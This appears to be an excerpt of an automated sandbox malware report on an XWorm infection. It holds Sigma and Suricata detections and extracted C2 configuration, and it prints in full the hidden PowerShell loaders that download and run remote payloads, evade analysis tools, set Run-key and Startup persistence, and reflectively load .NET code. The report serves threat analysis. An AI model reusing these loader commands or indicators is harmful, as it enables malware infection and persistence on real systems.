Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ProcessId: 6936, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7192, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_bsa

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ProcessId: 6936, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6936, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs, ProcessId: 2332, ProcessName: wscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2300, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", ProcessId: 7032, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6764, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY", ProcessId: 6936, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2080, TargetFilename: C:\Users\user\AppData\Local\Temp\dll03.ps1

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7396, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $EhgVw ) {$kwxxg = $menos ;}else {$kwxxg = ($kwxxg) ;};$dmpdz = (New-Object Net.WebClient);$dmpdz.Encoding = [System.Text.Encoding]::UTF8;$dmpdz.DownloadFile( $kwxxg, ($fbKNY + '\Upwin.msu') );$GAwCW = ( 'C:\Users\' + [Environment]::UserName );$glAoE = ($fbKNY + '\Upwin.msu'); powershell.exe wusa.exe $glAoE /quiet /norestart ; Copy-Item 'C:\Users\user\AppData\Local\Temp\x.vbs' -Destination ( $GAwCW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$Stringbase;Function BaseMy{;$RYdFr = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $RYdFr;};$lthpd = ('https://www.pastery.net/jvfvkt/raw/' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' );$webClient = New-Object System.Net.WebClient ;$FAwUL = $webClient.DownloadString( $lthpd ) ;$Stringbase = $FAwUL; $FAwUL = BaseMy;$FAwUL | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$jQcVn = ( [System.IO.Path]::GetTempPath() + 'dll02.txt' ) ;$cqiGn = New-Object System.Net.WebClient ;$cqiGn.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$ziUMM = $cqiGn.DownloadData( $nFuQG ) ;$tMRHF = [System.Text.Encoding]::UTF8.GetString($ziUMM);$tMRHF | Out-File -FilePath $jQcVn -force ;$RfmmO = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'' ) ; $ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$RfmmO += '[Byte[]] $RYdFr = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$RfmmO += '[System.AppDomain]:' + ':CurrentDomain.Load( $RYdFr ).' ;$RfmmO += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$RfmmO += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''gpj.1xlabolg/segami//or.murdlet//:sptth'' , ''C:\Users\user\AppData\Local\Temp\x.vbs'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\regasm'' ) );' ;$XvCTi = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$RfmmO | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $LTkZZ = $host.Version.Major.Equals(2) ;if ( $LTkZZ ) {$fbKNY = ( [System.IO.Path]::GetTempPath() );del ( $fbKNY + '\Upwin.msu' );$kwxxg = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T13:31:43.639593+0100	2020425	1	Exploit Kit Activity Detected	109.99.162.14	443	192.168.2.4	49742	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T13:31:43.639866+0100	2057635	1	A Network Trojan was detected	109.99.162.14	443	192.168.2.4	49742	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T13:31:44.733283+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	104.21.16.1	443	TCP
2025-02-27T13:31:45.542200+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	23.186.113.60	443	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-27T13:31:36.757489+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49737	23.186.113.60	443	TCP
2025-02-27T13:31:42.213150+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49739	23.186.113.60	443	TCP
2025-02-27T13:31:45.542200+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49745	23.186.113.60	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["expresswealthz.duckdns.org"], "Port": 3911, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: expresswealthz.duckdns.org
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 3911
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000039.00000002.2339225011.00000117DEAC8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source: unknown	HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49750 version: TLS 1.2
